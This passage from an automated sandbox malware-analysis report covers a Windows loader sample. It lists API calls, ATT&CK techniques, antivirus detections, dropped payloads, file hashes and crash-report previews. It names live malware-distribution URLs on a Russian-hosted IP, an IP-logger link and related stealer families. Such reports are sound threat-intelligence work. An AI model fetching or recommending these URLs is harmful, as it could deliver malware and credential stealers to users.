aleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00446333
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_00442624
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_00446F8F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_006810FA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00681886
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_0068198C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_00679996
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00681A5B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_006813E7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_0068139C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_00681482
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0068150D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00679E5B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00681760
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040DBE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040DBE5
Source: C:\Users\user\Desktop\nRGKqzVQRt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 22 Software Packing | Cached Domain Credentials | 33 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1528608, Sample: nRGKqzVQRt.exe, Startdate: 08/10/2024, Architecture: WINDOWS, Score: 100
Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 5 other signatures
Process nRGKqzVQRt.exe (started): DNS/IP 80.66.75.114, 49738, 80, RISS-ASRU, Russian Federation
Dropped by nRGKqzVQRt.exe (PE32): C:\Users\user\AppData\Local\...\Y-Cleaner.exe; C:\Users\user\...\Bunifu_UI_v1.5.3.dll; C:\Users\user\AppData\Local\...\dll[1]; C:\Users\user\AppData\Local\...\soft[1]
Signatures on nRGKqzVQRt.exe: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
Child processes (started): WerFault.exe (three shown), 5 other processes
Dropped by the child processes (Unicode): C:\ProgramData\Microsoft\...\Report.wer (six shown); 2 other malicious files

Source | Detection | Scanner | Label
nRGKqzVQRt.exe | 32% | Virustotal |
nRGKqzVQRt.exe | 100% | Avira | HEUR/AGEN.1306956
nRGKqzVQRt.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | 60% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dll | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe | 60% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
http://80.66.75.114/dll/downloadG | 9% | Virustotal |
http://80.66.75.114/dll/download | 19% | Virustotal |
http://80.66.75.114/dll/key | 19% | Virustotal |
http://80.66.75.114/dll/downloadC | 17% | Virustotal |
http://80.66.75.114/files/download | 20% | Virustotal |
https://iplogger.org/1Pz8p7 | 1% | Virustotal |
http://80.66.75.114/name | 20% | Virustotal |
http://80.66.75.114/soft/download | 19% | Virustotal |
http://80.66.75.114/soft/download? | 16% | Virustotal |
https://g-cleanit.hk | 1% | Virustotal |
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB | 19% | Virustotal |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://80.66.75.114/dll/key | false | | unknown
http://80.66.75.114/files/download | false | | unknown
http://80.66.75.114/dll/download | false | | unknown
http://80.66.75.114/soft/download | false | | unknown
http://80.66.75.114/name | false | | unknown
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://80.66.75.114/dll/downloadG | nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://g-cleanit.hk | nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | URL Reputation: safe | unknown
http://80.66.75.114/dll/downloadC | nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://80.66.75.114/dll/key%S | nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | unknown
https://iplogger.org/1Pz8p7 | nRGKqzVQRt.exe, 00000000.00000003.2544167124.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544198660.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543219760.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2544114531.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000003.2543263255.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | unknown
http://80.66.75.114/name5o1 | nRGKqzVQRt.exe, 00000000.00000002.2604107405.000000000081D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://80.66.75.114/soft/download? | nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
80.66.75.114 | unknown | Russian Federation | 20803 | RISS-ASRU | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528608
Start date and time:2024-10-08 04:23:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:nRGKqzVQRt.exe
renamed because original name is a hash value
Original Sample Name:75c689774e5b58a3c4ced392928b6053.exe
Detection:MAL
Classification:mal100.evad.winEXE@9/44@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 23
• Number of non-executed functions: 199
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.22
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
22:24:43 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
80.66.75.114 | BDY5OFXpM9.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 80.66.75.114/soft/download
80.66.75.114 | univ.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | univ.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 80.66.75.114/dl?name=mixnine
80.66.75.114 | file.exe | malicious | Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz | 80.66.75.114/dl?name=mixnine.exe
80.66.75.114 | file.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 80.66.75.114/soft/download
80.66.75.114 | t2UZUYgpKV.exe | malicious | GCleaner | 80.66.75.114/files/download
80.66.75.114 | 4cxqNGB7N2.exe | malicious | GCleaner | 80.66.75.114/files/download
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RISS-ASRU | BDY5OFXpM9.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 80.66.75.114
RISS-ASRU | univ.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | univ.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 80.66.75.114
RISS-ASRU | file.exe | malicious | Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz | 80.66.75.114
RISS-ASRU | file.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 80.66.75.114
RISS-ASRU | t2UZUYgpKV.exe | malicious | GCleaner | 80.66.75.114
RISS-ASRU | 4cxqNGB7N2.exe | malicious | GCleaner | 80.66.75.114
No context
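Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | BDY5OFXpM9.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1] | file.exe | malicious | GCleaner, Nymaim
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | BDY5OFXpM9.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1] | file.exe | malicious | GCleaner, Nymaim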
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9845922454673502
Encrypted:false
SSDEEP:96:lnPGuuwsvhqkoW7RM6tQXIDcQBc6Wu2hcE6cw33+HbHg/8BRTf32rLWIOy4Hov9u:dPGuuwJJ0PKAAjhUVBzuiFeZ24IO8O
MD5:C80D43C5DD6C679972945225610CE419
SHA1:84C9880672B1BB874EAC3F094CAC01984FD187AE
SHA-256:7952B44BDEB11F34A9FD8B1E214C99ED4DEB6EA68A1EE9037DF633C4BA13DCF7
SHA-512:A3D9BD57F49F3658FD16A349D245CB84E68808E3F87660BF29DD5AD33759C93ABA4F52F8E2EACFD343FC6BE5C2554492CCB692A416D919F8C7E3826A8692A307
Malicious:true
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9750265064621326
Encrypted:false
SSDEEP:96:WvugGu0svhqk97qxn3QXIDcQQc6McEpcw3v9+HbHg/8BRTf32rLWIOy4Hov9mEDj:klGu0J5m0uITTajhUVBzuiFeZ24IO8L
MD5:CE58BD55D084C1554DF5D416958FEB73
SHA1:3C07603E7F49EAD0F519BCC8024B95E9D36DDD41
SHA-256:703DE8008F47E99727584130FA4C3A61474C6F46D5155DA583D2E3D4DF3CDE8C
SHA-512:CEB855F5129EA52A629C7A3149C36ADEE215BC8C6EC78B9D21EF78CF0DE67580DC499B3F1C68B95341E19C9CCD5064F2C9857E5A281F0A93483C28DF892A62BC
Malicious:true
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8393483897477912
Encrypted:false
SSDEEP:96:MzqGuWsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9mEr:MOGuWJM056rAjhKzuiF5Z24IO8O
MD5:0936B836EF6D793A641BEB812FB4186C
SHA1:CEA6AED7EF57317BF500A993416494E5FA517502
SHA-256:EF9A5BC1D457C57A7ABCAC2652ECCA0A8FFC26E59FEA59C48889088CBFF7E40B
SHA-512:F1AC061D0AD4DDA155FDFF79160B7FEBF47D01CFEF2360134FC1B8B3F477B18A77AB7AE9009704258B1C59529D09132565BFC2C944D907562E7EF33AC880E4EC
Malicious:true
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8395014689465913
Encrypted:false
SSDEEP:96:rn1RGuasvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9me:zjGuaJM056rAjhKzuiF5Z24IO8O
MD5:313CC607C8B2266A85E8607968C750E2
SHA1:5D1655560129EC5F8EC34BC3423704B324E4DA93
SHA-256:4138D4DE2360EE50C17A407346F03773702F730E998ACBDD8B7DDFA60248F93E
SHA-512:3A4573DF8A7FA27BE5F6471207F44A0D9717158F1E7B2B59A6A29D64A0571C99D009FA765310DF47777321378433AAD4F9F6FAC6903B632E31CE355EE49CD6E2
Malicious:true
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8392759670559924
                                                Encrypted:false
                                                SSDEEP:96:gYcFfGuJsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9B:N8GuJJM056rAjhKzuiF5Z24IO8O
                                                MD5:4989F622C43C00557F052394EA0E089F
                                                SHA1:295B318D176010E6F61FBB1F3D241016211C070D
                                                SHA-256:C334EE7476D615B2DA4848E5CA5F076B78EB4FEAA6074469A676DD831626BCFB
                                                SHA-512:47A5F34D45D892F3E553FDF358B71501F600A8EAF5553906FD06F986816F7292B128A3890D6537164292F58E7F1D0AC4A0BBCD6E56849FB93CD3B2B474BDF74C
                                                Malicious:true
                                                Preview:Version=1..EventType=BEX..EventTime=133728278448715361..ReportType=2..Consent=1..ReportIdentifier=c90bd162-8e24-4dab-882c-185572e12616..IntegratorReportIdentifier=f4cba2dc-3f2b-4608-9f77-4a6821e409cf..Wow64Host=34404..Wow64Guest=332..NsAppName=nRGKqzVQRt.exe..AppSessionGuid=00000c8c-0001-0015-4442-7f232919db01..TargetAppId=W:00062ad71041400f3401dac992aa47dc0a270000ffff!00006df791246e3cf66eaca12d98c0d92a686423316f!nRGKqzVQRt.exe..TargetAppVer=2024//09//27:02:34:33!0!nRGKqzVQRt.exe..BootId=429496
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8550835747720145
                                                Encrypted:false
                                                SSDEEP:96:Z0lGudsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9mEV:QGudJM056rAjhgzuiF5Z24IO8O
                                                MD5:CFE700DCF281D7EC293B8E65737877B8
                                                SHA1:5C54B7C0E588FDF3A6C4EB48458CEB8EAD7163EF
                                                SHA-256:F08684BEB875C27F48125937F9AE913044C5D81441BA3BD7AD7F2375F3250350
                                                SHA-512:A894283BDC76DB72479EFF72086E560F7DE5E3A9C12D14CB8E706782BD126EE22C77B5F663B37EE18A209D803F245B72E7812FB92E34F765AE62A74A41F4B544
                                                Malicious:true
                                                Preview:Version=1..EventType=BEX..EventTime=133728278475769725..ReportType=2..Consent=1..ReportIdentifier=c90fdb66-40d1-4f87-8995-8ec3b1052dc7..IntegratorReportIdentifier=b842364e-6148-472c-b867-df4ae0621876..Wow64Host=34404..Wow64Guest=332..NsAppName=nRGKqzVQRt.exe..AppSessionGuid=00000c8c-0001-0015-4442-7f232919db01..TargetAppId=W:00062ad71041400f3401dac992aa47dc0a270000ffff!00006df791246e3cf66eaca12d98c0d92a686423316f!nRGKqzVQRt.exe..TargetAppVer=2024//09//27:02:34:33!0!nRGKqzVQRt.exe..BootId=429496
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8390691430591861
                                                Encrypted:false
                                                SSDEEP:96:ZLuU4hGuSsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hovz:Fb0GuSJM056rAjhKzuiF5Z24IO8O
                                                MD5:2B4B24A7BF6367208E72E85471C51B53
                                                SHA1:8D5B29114EE07546BA41895A03CDC6FEA6807C17
                                                SHA-256:0B8B5676FFDA78DED54ACDEBD8875DA7EB23DB155C03256118A626339AE26A82
                                                SHA-512:19974D9EE09A285E936B2C9F1AB94F76079E161907039046F95F934E7970ACA5AF293F584A6942C9FF64F8D5B481743ED4FD2729F503BEB5038D1ED4B5B5A430
                                                Malicious:true
                                                Preview:Version=1..EventType=BEX..EventTime=133728278465183175..ReportType=2..Consent=1..ReportIdentifier=d5e694f9-d00b-44c6-955c-c0802dc13cf9..IntegratorReportIdentifier=3b415f65-cbe9-4e3d-99b3-d0a734ad9c4e..Wow64Host=34404..Wow64Guest=332..NsAppName=nRGKqzVQRt.exe..AppSessionGuid=00000c8c-0001-0015-4442-7f232919db01..TargetAppId=W:00062ad71041400f3401dac992aa47dc0a270000ffff!00006df791246e3cf66eaca12d98c0d92a686423316f!nRGKqzVQRt.exe..TargetAppVer=2024//09//27:02:34:33!0!nRGKqzVQRt.exe..BootId=429496
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):65536
                                                Entropy (8bit):0.8817388898865095
                                                Encrypted:false
                                                SSDEEP:96:o00QYGuGsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9f:x0QYGuGJM056rAjhszuiF5Z24IO8O
                                                MD5:29F8FA9DE1E520E20A4AEB653584C9C8
                                                SHA1:12AF53EF8FEBFE28129084437433D143BB2E6FBD
                                                SHA-256:557F7724C0CFAEC14D5E2FFD99472B9FC429864306F1D69CCFE6CABF66CF4ACD
                                                SHA-512:11108351686A852786AEFEFEA244AAB2C8F91BE3DB585D8C095912F55B922DA9D501F728E0197B412F363FBB29B67FACA75266D10620113ADEA30B936B4A0102
                                                Malicious:true
                                                Preview:Version=1..EventType=BEX..EventTime=133728278482420052..ReportType=2..Consent=1..ReportIdentifier=edc95a15-6c1f-41e1-bf28-6f154e4f01fb..IntegratorReportIdentifier=2d2731fe-4622-4e93-96fe-a798538ecafd..Wow64Host=34404..Wow64Guest=332..NsAppName=nRGKqzVQRt.exe..AppSessionGuid=00000c8c-0001-0015-4442-7f232919db01..TargetAppId=W:00062ad71041400f3401dac992aa47dc0a270000ffff!00006df791246e3cf66eaca12d98c0d92a686423316f!nRGKqzVQRt.exe..TargetAppVer=2024//09//27:02:34:33!0!nRGKqzVQRt.exe..BootId=429496
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:04 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67928
                                                Entropy (8bit):2.318587189313229
                                                Encrypted:false
                                                SSDEEP:384:gfwRsm9baM2b5y8dJdZD2XDglg1Nk2GAlEsuGzrTcmWlv2MebV2UOiyZ:goWubcA8vD2hORmZ1XE2Mu5y
                                                MD5:FB03581A322E0E8F9EC8F07D41ADF9D1
                                                SHA1:A59CC656EB3A8E85466CC74B45529400D42A3761
                                                SHA-256:91B685FEC55576F4ED6C1037E7A4C197F753E7906F4C6DC849E6238F62977D33
                                                SHA-512:801F1C33B9D2D7125E773C975EB122EBC28467AF4DCA37D6AE8EBA3349B1A060CE5E16123D49E00F9A67A315009CBEC2EC85F170C9266C5DC954618CD6465DD5
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
